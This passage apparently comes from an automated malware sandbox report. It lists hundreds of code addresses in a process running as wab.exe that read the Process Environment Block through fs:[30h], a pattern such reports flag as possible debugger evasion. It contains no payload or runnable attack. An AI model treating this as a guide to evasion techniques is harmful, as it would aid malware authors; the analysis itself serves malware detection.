          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B35096 mov eax, dword ptr fs:[00000030h]15_2_23B35096
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D090 mov eax, dword ptr fs:[00000030h]15_2_23B5D090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D090 mov eax, dword ptr fs:[00000030h]15_2_23B5D090
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6909C mov eax, dword ptr fs:[00000030h]15_2_23B6909C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3208A mov eax, dword ptr fs:[00000030h]15_2_23B3208A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2D08D mov eax, dword ptr fs:[00000030h]15_2_23B2D08D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2C0F0 mov eax, dword ptr fs:[00000030h]15_2_23B2C0F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B720F0 mov ecx, dword ptr fs:[00000030h]15_2_23B720F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B550E4 mov eax, dword ptr fs:[00000030h]15_2_23B550E4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B550E4 mov ecx, dword ptr fs:[00000030h]15_2_23B550E4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A0E3 mov ecx, dword ptr fs:[00000030h]15_2_23B2A0E3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B380E9 mov eax, dword ptr fs:[00000030h]15_2_23B380E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB60E0 mov eax, dword ptr fs:[00000030h]15_2_23BB60E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB20DE mov eax, dword ptr fs:[00000030h]15_2_23BB20DE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B590DB mov eax, dword ptr fs:[00000030h]15_2_23B590DB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov ecx, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B470C0 mov eax, dword ptr fs:[00000030h]15_2_23B470C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAD0C0 mov eax, dword ptr fs:[00000030h]15_2_23BAD0C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAD0C0 mov eax, dword ptr fs:[00000030h]15_2_23BAD0C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h]15_2_23BF903E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h]15_2_23BF903E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h]15_2_23BF903E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF903E mov eax, dword ptr fs:[00000030h]15_2_23BF903E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2A020 mov eax, dword ptr fs:[00000030h]15_2_23B2A020
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2C020 mov eax, dword ptr fs:[00000030h]15_2_23B2C020
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05060 mov eax, dword ptr fs:[00000030h]15_2_23C05060
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h]15_2_23B4E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h]15_2_23B4E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h]15_2_23B4E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E016 mov eax, dword ptr fs:[00000030h]15_2_23B4E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB4000 mov ecx, dword ptr fs:[00000030h]15_2_23BB4000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov ecx, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B41070 mov eax, dword ptr fs:[00000030h]15_2_23B41070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5C073 mov eax, dword ptr fs:[00000030h]15_2_23B5C073
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAD070 mov ecx, dword ptr fs:[00000030h]15_2_23BAD070
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB106E mov eax, dword ptr fs:[00000030h]15_2_23BB106E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B32050 mov eax, dword ptr fs:[00000030h]15_2_23B32050
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BD705E mov ebx, dword ptr fs:[00000030h]15_2_23BD705E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BD705E mov eax, dword ptr fs:[00000030h]15_2_23BD705E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5B052 mov eax, dword ptr fs:[00000030h]15_2_23B5B052
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB6050 mov eax, dword ptr fs:[00000030h]15_2_23BB6050
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D7B0 mov eax, dword ptr fs:[00000030h]15_2_23B5D7B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F7BA mov eax, dword ptr fs:[00000030h]15_2_23B2F7BA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB97A9 mov eax, dword ptr fs:[00000030h]15_2_23BB97A9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h]15_2_23BBF7AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h]15_2_23BBF7AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h]15_2_23BBF7AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h]15_2_23BBF7AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BBF7AF mov eax, dword ptr fs:[00000030h]15_2_23BBF7AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B307AF mov eax, dword ptr fs:[00000030h]15_2_23B307AF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF78A mov eax, dword ptr fs:[00000030h]15_2_23BEF78A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B347FB mov eax, dword ptr fs:[00000030h]15_2_23B347FB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B347FB mov eax, dword ptr fs:[00000030h]15_2_23B347FB
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3D7E0 mov ecx, dword ptr fs:[00000030h]15_2_23B3D7E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B527ED mov eax, dword ptr fs:[00000030h]15_2_23B527ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B527ED mov eax, dword ptr fs:[00000030h]15_2_23B527ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B527ED mov eax, dword ptr fs:[00000030h]15_2_23B527ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3C7C0 mov eax, dword ptr fs:[00000030h]15_2_23B3C7C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B357C0 mov eax, dword ptr fs:[00000030h]15_2_23B357C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B357C0 mov eax, dword ptr fs:[00000030h]15_2_23B357C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B357C0 mov eax, dword ptr fs:[00000030h]15_2_23B357C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C037B6 mov eax, dword ptr fs:[00000030h]15_2_23C037B6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB07C3 mov eax, dword ptr fs:[00000030h]15_2_23BB07C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29730 mov eax, dword ptr fs:[00000030h]15_2_23B29730
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29730 mov eax, dword ptr fs:[00000030h]15_2_23B29730
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B65734 mov eax, dword ptr fs:[00000030h]15_2_23B65734
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3973A mov eax, dword ptr fs:[00000030h]15_2_23B3973A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3973A mov eax, dword ptr fs:[00000030h]15_2_23B3973A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C03749 mov eax, dword ptr fs:[00000030h]15_2_23C03749
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6273C mov eax, dword ptr fs:[00000030h]15_2_23B6273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6273C mov ecx, dword ptr fs:[00000030h]15_2_23B6273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6273C mov eax, dword ptr fs:[00000030h]15_2_23B6273C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAC730 mov eax, dword ptr fs:[00000030h]15_2_23BAC730
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF72E mov eax, dword ptr fs:[00000030h]15_2_23BEF72E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B33720 mov eax, dword ptr fs:[00000030h]15_2_23B33720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4F720 mov eax, dword ptr fs:[00000030h]15_2_23B4F720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4F720 mov eax, dword ptr fs:[00000030h]15_2_23B4F720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4F720 mov eax, dword ptr fs:[00000030h]15_2_23B4F720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF972B mov eax, dword ptr fs:[00000030h]15_2_23BF972B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6C720 mov eax, dword ptr fs:[00000030h]15_2_23B6C720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6C720 mov eax, dword ptr fs:[00000030h]15_2_23B6C720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B30710 mov eax, dword ptr fs:[00000030h]15_2_23B30710
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B60710 mov eax, dword ptr fs:[00000030h]15_2_23B60710
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6F71F mov eax, dword ptr fs:[00000030h]15_2_23B6F71F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6F71F mov eax, dword ptr fs:[00000030h]15_2_23B6F71F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B37703 mov eax, dword ptr fs:[00000030h]15_2_23B37703
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B35702 mov eax, dword ptr fs:[00000030h]15_2_23B35702
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B35702 mov eax, dword ptr fs:[00000030h]15_2_23B35702
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6C700 mov eax, dword ptr fs:[00000030h]15_2_23B6C700
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B38770 mov eax, dword ptr fs:[00000030h]15_2_23B38770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B40770 mov eax, dword ptr fs:[00000030h]15_2_23B40770
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h]15_2_23B2B765
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h]15_2_23B2B765
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h]15_2_23B2B765
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2B765 mov eax, dword ptr fs:[00000030h]15_2_23B2B765
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B30750 mov eax, dword ptr fs:[00000030h]15_2_23B30750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72750 mov eax, dword ptr fs:[00000030h]15_2_23B72750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B72750 mov eax, dword ptr fs:[00000030h]15_2_23B72750
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB4755 mov eax, dword ptr fs:[00000030h]15_2_23BB4755
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B43740 mov eax, dword ptr fs:[00000030h]15_2_23B43740
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B43740 mov eax, dword ptr fs:[00000030h]15_2_23B43740
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B43740 mov eax, dword ptr fs:[00000030h]15_2_23B43740
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6674D mov esi, dword ptr fs:[00000030h]15_2_23B6674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6674D mov eax, dword ptr fs:[00000030h]15_2_23B6674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6674D mov eax, dword ptr fs:[00000030h]15_2_23B6674D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h]15_2_23C0B73C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h]15_2_23C0B73C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h]15_2_23C0B73C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0B73C mov eax, dword ptr fs:[00000030h]15_2_23C0B73C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B276B2 mov eax, dword ptr fs:[00000030h]15_2_23B276B2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B276B2 mov eax, dword ptr fs:[00000030h]15_2_23B276B2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B276B2 mov eax, dword ptr fs:[00000030h]15_2_23B276B2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B666B0 mov eax, dword ptr fs:[00000030h]15_2_23B666B0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6C6A6 mov eax, dword ptr fs:[00000030h]15_2_23B6C6A6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2D6AA mov eax, dword ptr fs:[00000030h]15_2_23B2D6AA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2D6AA mov eax, dword ptr fs:[00000030h]15_2_23B2D6AA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34690 mov eax, dword ptr fs:[00000030h]15_2_23B34690
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B34690 mov eax, dword ptr fs:[00000030h]15_2_23B34690
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h]15_2_23BB368C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h]15_2_23BB368C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h]15_2_23BB368C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB368C mov eax, dword ptr fs:[00000030h]15_2_23BB368C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h]15_2_23BAE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h]15_2_23BAE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h]15_2_23BAE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAE6F2 mov eax, dword ptr fs:[00000030h]15_2_23BAE6F2
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB06F1 mov eax, dword ptr fs:[00000030h]15_2_23BB06F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB06F1 mov eax, dword ptr fs:[00000030h]15_2_23BB06F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BED6F0 mov eax, dword ptr fs:[00000030h]15_2_23BED6F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h]15_2_23BC36EE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h]15_2_23BC36EE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h]15_2_23BC36EE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h]15_2_23BC36EE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h]15_2_23BC36EE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BC36EE mov eax, dword ptr fs:[00000030h]15_2_23BC36EE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D6E0 mov eax, dword ptr fs:[00000030h]15_2_23B5D6E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5D6E0 mov eax, dword ptr fs:[00000030h]15_2_23B5D6E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6A6C7 mov ebx, dword ptr fs:[00000030h]15_2_23B6A6C7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6A6C7 mov eax, dword ptr fs:[00000030h]15_2_23B6A6C7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h]15_2_23B3B6C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h]15_2_23B3B6C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h]15_2_23B3B6C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h]15_2_23B3B6C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h]15_2_23B3B6C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3B6C0 mov eax, dword ptr fs:[00000030h]15_2_23B3B6C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h]15_2_23BF16CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h]15_2_23BF16CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h]15_2_23BF16CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF16CC mov eax, dword ptr fs:[00000030h]15_2_23BF16CC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF6C7 mov eax, dword ptr fs:[00000030h]15_2_23BEF6C7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B616CF mov eax, dword ptr fs:[00000030h]15_2_23B616CF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E627 mov eax, dword ptr fs:[00000030h]15_2_23B4E627
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2F626 mov eax, dword ptr fs:[00000030h]15_2_23B2F626
